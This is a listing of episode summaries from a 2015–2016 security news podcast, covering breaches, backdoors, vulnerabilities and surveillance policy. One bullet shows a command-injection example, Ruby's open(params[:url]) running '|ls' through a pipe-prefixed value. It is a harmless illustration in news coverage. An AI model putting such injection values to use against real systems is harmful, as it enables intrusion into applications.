[ Subscribe to the Podcast: iTunes | Android | RSS ] News * [ ] Apple calls out FBI on iPhone decryption case * [ ] Trump calls for a boycott of Apple, from an iPhone * [ ] Judge Rules FBI Must Reveal Malware It Used to Hack Over 1,000 Computers * [ ] Wow. Someone hacked @linuxmint’s website and replaced ISOs with backdoored version today http://blog.linuxmint.com/?p=2994 * [ ] This affects a universally used library (glibc) at a universally used protocol (DNS). Generic tools that we didn’...
Feb 23, 2016•19 min
[ Subscribe to the Podcast: iTunes | Android | RSS ] News [ ] Major Cisco ASA buffer overflow; patch now [ ] Critical patches for Windows and Flash [ ] The FBI is officially investigating Hillary Clinton regarding her private email server [ ] NSA doing a complete reorg (basically combining defense and offense) […] -- :: T1SP: Episode 28 appeared originally on danielmiessler.com . :: Subscribe to Unsupervised Learning --- my weekly show where I handpick the best stories from infos...
Feb 15, 2016•42 min
[ Subscribe to the Podcast: iTunes | Android | RSS ] News [ ] Heavy surveillance around the Super Bowl [ ] A new BlackEnergy spear phishing campaign is targeting more Ukrainian companies [ ] Magneto, the popular e-commerce CMS, releases fixes to critical XSS issues [ ] Someone has posted private files of America’s […] -- :: T1SP: Episode 27 appeared originally on danielmiessler.com . :: Subscribe to Unsupervised Learning --- my weekly show where I handpick the best stories from i...
Feb 02, 2016•23 min
[ Subscribe to the Podcast: iTunes | Android | RSS ] News [ ] Backdoor found in AMX devices that run corporate and government conference rooms [ ] Autopwn every Android device on your network using BetterCap and addJavascritInterface [ ] Cyber insurance challenged: a lawsuit for failing to cover a 500K loss in Houston […] -- :: T1SP: Episode 26 appeared originally on danielmiessler.com . :: Subscribe to Unsupervised Learning --- my weekly show where I handpick the best stories fr...
Jan 25, 2016•49 min
[ Subscribe to the Podcast: iTunes | Android | RSS ] News * [ ] TrendMicro node.js server listening on localhost can execute commands; exposed to the internet * [ ] SSH backdoor found in Fortinet firewalls * [ ] SSH client vulnerability * [ ] Australia’s Cybercrime Online Reporting Network (ACORN) received over 39K reports of criminal activity in 2015 * [ ] Hyatt names 250 hotels hit by malware, includes the one for DerbyCon * [ ] Web sense rebranding as Forepoint, acquires Intel’s firewall busi...
Jan 19, 2016•26 min
[ Subscribe to the Podcast: iTunes | Android | RSS ] News * [ ] Norse lays of 20 people; not clear what percentage that is; threat intel not going so well? * [ ] OPM declines to release details on its big breach * [ ] Juniper says it’s going to remove the code that it thinks was developed by the NSA to eavesdrop on traffic * [ ] CVE details lists (OS X, iOS, Flash, Air, IE, Chrome, Firefox) as the software with the most issues * [ ] GM is going to do a bug bounty * [ ] The Hacker Manifesto turne...
Jan 11, 2016•28 min
[ Subscribe to the Podcast: iTunes | Android | RSS ] News * [ ] Juniper backdoor; could have been found with diff; signs point to NSA * [ ] RCE on FireEye appliances * [ ] Hyatt got hacked; malware on POS * [ ] 45K drones registered with FAA within 2 days * [ ] Industry moving towards password-free logins; still single factor, now the factor is your device; although access to device could require factors * [ ] Microsoft will now tell you if your account has been targeted by government authoritie...
Jan 04, 2016•55 min
[ Subscribe to the Podcast: iTunes | Android | RSS ] In this episode I explore the topic of Security and Obscurity by reading my popular essay on the topic. Notes * The intro track is from one of my favorite EDM artists: Zomby . The song is ‘Orion’, and it’s from the ‘With Love’ album. Highly recommended if you like chill EDM. Become a Member: https://danielmiessler.com/upgrade See omnystudio.com/listener for privacy information....
Dec 13, 2015•10 min
[ Subscribe to the Podcast: iTunes | Android | RSS ] Topics for this episode: News * [ ] Stringing Shodan to exploitation * [ ] Why you need to check HaveIBeenPwned * [ ] Another DELL root cert hacked * [ ] ISIS OPSEC advice (data privacy, tor, crytocat, telegram, proton mail, gps features on mobile devices, etc.) They also mention not to use instagram because Facebook has a poor privacy record. * [ ] Obama wants to make it harder for terrorists to use technology to escape from justice * [ ] DHS...
Dec 13, 2015•18 min
Topics for this episode: News and analysis * [ ] Ads using high frequency sound to communicate across devices. The ultrasonic pitches are embedded into TV commercials or are played when a user encounters an ad displayed in a computer browser. While the sound can’t be heard by the human ear, nearby tablets and smartphones can detect it. When they do, browser cookies can now pair a single user to multiple devices and keep track of what TV commercials the person sees, how long the person watc...
Dec 07, 2015•24 min
Companies don't want employees, and they're doing their best to get rid of them. We should be getting ready for this. Become a Member: https://danielmiessler.com/upgrade See omnystudio.com/listener for privacy information.
Nov 17, 2015•4 min
Topics for this episode: News and analysis * [ ] A couple of months into my job with IOActive * [ ] Paris Attacks: resilience vs. prevention * [ ] Updating the OWASP IoT Project (no longer the Top 10) It’s an umbrella project. * [ ] Adding to the IoT project the SCADA Top 10 List (read the list), and Nabil Ouchn is going to be project leader on that project * [ ] Pentagon farms coding to Russia * [ ] Crypto email service pays ransom, gets taken out anyway * [ ] Blackout Europe shows vulnerabilit...
Nov 16, 2015•31 min
Topics for this episode: News and analysis * Sonar framework * Schneider Electric SCADA issues revealed at DEFCON * Ashley Madison hack, extortion will become more common, passwords added to SecLists * Hackers attack PR firm and manipulate stocks * Uber is quadrupling their security staff in 2015 * Android vulnerabilities lately Ideas and commentary * Business-based hacking: extortion-based hacking, ransomware, prediction-based hacking, PR releases, etc. Find the leverage, then execute the hack ...
Aug 25, 2015•27 min
[ NOTE: There are spoilers below, not just for this episode but for the show in general. ] Enough people have asked me to start doing reviews of Mr. Robot episodes that I’m going to have a go at it. The deciding factor was the fact that I had such a strong desire to write during the third episode. I’m going to start here with thoughts on the show in general, not just on episode 3. Mr. Robot in general The character The main protagonist is an interesting character. He is what the writ...
Jul 19, 2015•19 min
Topics for this episode: Announcements * [ ] New desk, new mic setup News * [ ] SSL vuln spoofing issue, requires mitm * [ ] Sleepy puppy XSS Payload Management Framework * [ ] Troy Hunt on tech presentations * [ ] Stock market attacked and taken down. Anonymous warned about it beforehand * [ ] OPM goes to 21.5 million cards; director steps down * [ ] People need to get fired for this stuff; it’s the only way anyone will care enough to do anything * [ ] National Guard announces data breach Comme...
Jul 12, 2015•26 min
Topics for this episode: * [ ] Hacking Team Hacked, show which oppressive governments bought their software * [ ] No exploits for non-jailbroken iPhone * [ ] The FBI spent 775K on Hacking Team software * [ ] Citi creating a digital currency, called Citicoin * [ ] Clinton attacking China on hacking, “Said they’re trying to hack into everything that doesn’t move.” * [ ] Eric Holder suggests that Snowden had a positive impact, and that an agreement could be reached * [ ] Critical bug in node.js pat...
Jul 07, 2015•7 min
Topics for this episode: * iOS flaw * The Chinese hacking campaign against the US * Breach at Recorded future * Hacking cars through key fobs * NSA/GCHQ hacking of people through security software * Snowden’s documents in the hands of the Chinese and Russians * Samsung re-enabling Windows Update * Mr. Robot * Blackhat/DEFCON Notes * The intro track is from one of my favorite EDM artists: Zomby . The song is ‘Orion’, and it’s from the ‘With Love’ album. Highly recommended if you like chill ...
Jun 29, 2015•14 min
Notes * The intro track is from one of my favorite EDM artists: Zomby . The song is ‘Orion’, and it’s from the ‘With Love’ album. Highly recommended if you like chill EDM. Become a Member: https://danielmiessler.com/upgrade See omnystudio.com/listener for privacy information.
Jun 15, 2015•23 min
Notes * The intro track is from one of my favorite EDM artists: Zomby . The song is ‘Orion’, and it’s from the ‘With Love’ album. Highly recommended if you like chill EDM. Become a Member: https://danielmiessler.com/upgrade See omnystudio.com/listener for privacy information.
Jun 12, 2015•43 min
Play Podcast START CONTENT * Singtel buys Trustwave * Snowden does interview with John Oliver * CheckPoint buys Lacoon * Everyone’s trying to do everything, which gives the big people a major advantage * China melted GitHub * MiTM’d Baidu traffic and modified its analytics JavaScript to make constant requests to GitHub * They did it because GitHub was hosting two mirror repos for content that is banned in China * Also highlights the need for encryption, so that the JS couldn’t ...
Apr 08, 2015•14 min
Play Podcast START CONTENT * Twitch, a game streaming service owned by Amazon, was hacked last week * Passwords, emails, usernames, addresses, phone numbers, dates of birth * Amazon bought them last year for almost 1 billion dollars * Bar Mitzvah attack on TLS * Requires that you can sniff traffic * Basically an RC4 problem * Solution is to remove it from your supported algorithms * GitHub Has been hit by a massive DDoS attack * Apparently from China * CSRF vulnerability found in a wind turbine ...
Mar 30, 2015•17 min
Play Podcast START CONTENT * There was another SQL Injection bug found in SEO by Yoast * It required admins to click a malicious link * Was patched quickly * It’s the plugins that make WordPress vulnerable * Attackers are targeting gamers for ransomware * Virlock is one version of ransomware that not only locks the screen, but infects files * It’s also polymorphic, so it changes itself every time it runs * TeslaCrypt goes after gamers, which seems super smart because they are often a...
Mar 16, 2015•22 min
START CONTENT * Sorry about the audio last week; wireless headsets don’t compare to the Yeti * The CIA is focusing on cyberespionage in its new management * Anthem is refusing an audit by the OIG office–an org that audits health care groups that provide services to federal employees * Nothing says I’m guilty like refusing an audit * Reminds me of the Russians refusing the crash investigation in Game of Cards * There’s been a possible credit card breach at the Mandarin Ori...
Mar 09, 2015•13 min
START CONTENT * New SSL attack called FREAK * Has to do with falling RSA back to a deprecated and weak level * Requires the client and server are both vulnerable * The solution is to patch * Many orgs will also want to note which servers were vulnerable * The lesson is that you don’t reduce security to increase it * Backdoors x time = regret * Using Ruby’s Open-URI could be dangerous * open-uri monkeypatches kernel.open * open(params[:url]) can execute |ls * Hilary Clinton used a per...
Mar 03, 2015•16 min
START CONTENT * New stuxnet like piece of malware was discovered * Was found by Kaspersky * Has infected thousands of computers, mostly in Iran * The malware is the most advanced ever found * Can hide on the computer even after reinstall * Many of the names used in the application are known NSA codenames, such as GROK * Wired said those targeted groups were Islamic scholars * The group is called equation group due to the encryption used to hide itself * Car washes hacked by Billie Rios * Bad web...
Feb 24, 2015•9 min
START CONTENT * Ukrainian banks hacked for up to 1 Billion dollars * Evidently installed malware on bank admin machines using phishing * Not sure they have an FDIC * As if the Ukraine didn’t have enough problems * 10 million password project * Mark Burnett posted 10 Million password combinations * Went through a long explanation of why he was doing it * I’ve broken them up and put them in the SecLists project * Jeb Bush leaks personal data * Anthem may have been Heartbleed * Could ha...
Feb 17, 2015•12 min
START CONTENT * Anthem, the second largest healthcare company, had a major breach * They lost around 80 million socials, addresses, emails, etc., which is roughly double the Target breach * There’s speculation that it was China, trying to penetrate government, but it’s early * Watch for phishing scams related to it * The megabreaches continue…weee! * A WordPress plugin called FancyBox had a serious compromise in it last week, which affected thousands of websites * If you’re goi...
Feb 08, 2015•7 min
START CONTENT * Ghost bug in PHP could affect millions of servers * Flaw is in glibc, which is extensively by all Linux distributions * Patch and reboot using yum or aptitude * The US Army Released DShell, a malware forensics tool * This is an interesting trend where we see tons of formerly secret groups flock to Github. Great to see * Reddit released its first transparency report last week * Says it received 55 requests for user information * Says it complied with 64% of state and federal reque...
Feb 02, 2015•8 min
START CONTENT * There was an issue with the Marriott website that exposed reservations and payment information. It’s now been fixed * Police are now using a new radar to see into peoples’ homes without a warrant * Security budgets are reportedly going up due to the mega-breaches in 2014 * Also leading to higher pay for CIOs * Anecdotally, I’d say it’s a pretty good time to be in infosec * A new security startup, PFP Cybersecurity, uses power consumption to detect malware ...
Jan 25, 2015•11 min
START CONTENT * UK police arrest 18-year-old in connection to Playstation and XBox attack * Major ASUS router bug * Local users can take full control without a password * Biggest issue there seems to be DNS hijacking * Legislative attacks on infosec profession and encryption * Anti-hacking law language ambiguous “according to owner” * Obama is said to agree with Cameron, but it’s complicated * Evidence of a plot is different than outlawing encryption * There’s other talk ...
Jan 19, 2015•16 min
